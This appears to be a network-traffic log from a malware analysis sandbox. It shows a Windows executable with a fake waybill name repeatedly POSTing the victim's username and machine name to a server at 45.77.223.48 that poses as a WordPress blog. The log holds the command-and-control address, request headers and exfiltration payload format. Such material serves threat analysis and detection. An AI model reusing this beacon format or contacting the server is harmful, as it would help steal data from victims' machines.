Apr 25, 2024 09:41:59.637612104 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:41:59.637623072 CEST	11	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 Data Ascii: UTF-8" />
Apr 25, 2024 09:41:59.637634039 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:41:59.645780087 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:41:59.645935059 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:41:59.645946980 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:41:59.646034002 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:41:59.646275997 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:41:59.646289110 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49745	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:41:59.827008009 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:41:59.956965923 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:00.768182993 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:41:59 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:00.768244982 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:00.768346071 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:42:00.768455029 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:42:00.768543005 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:00.776303053 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:00.776660919 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:00.777019024 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:00.777092934 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:00.777260065 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49747	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:01.045653105 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:01.173758030 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:01.994920969 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:01 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:01.995078087 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:01.995270014 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:42:01.995420933 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:42:01.995500088 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:02.004235983 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:02.004514933 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:02.004834890 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:02.005096912 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:02.005229950 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49749	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:02.263835907 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:02.394774914 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:03.227276087 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:02 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:03.227760077 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:03.227794886 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:03.238481045 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:03.238517046 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:03.238554955 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:03.238647938 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:03.238684893 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:03.238723040 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:03.238784075 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49752	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:03.512691021 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:03.639851093 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:04.441059113 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:03 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:04.441215992 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:04.441288948 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:04.450273991 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:04.450953007 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:04.451003075 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:04.451138020 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:04.451410055 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:04.451426983 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:04.451560020 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49754	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:04.713098049 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:04.840243101 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:05.713538885 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:04 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:05.713641882 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:05.713757992 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:42:05.713814974 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:42:05.713941097 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
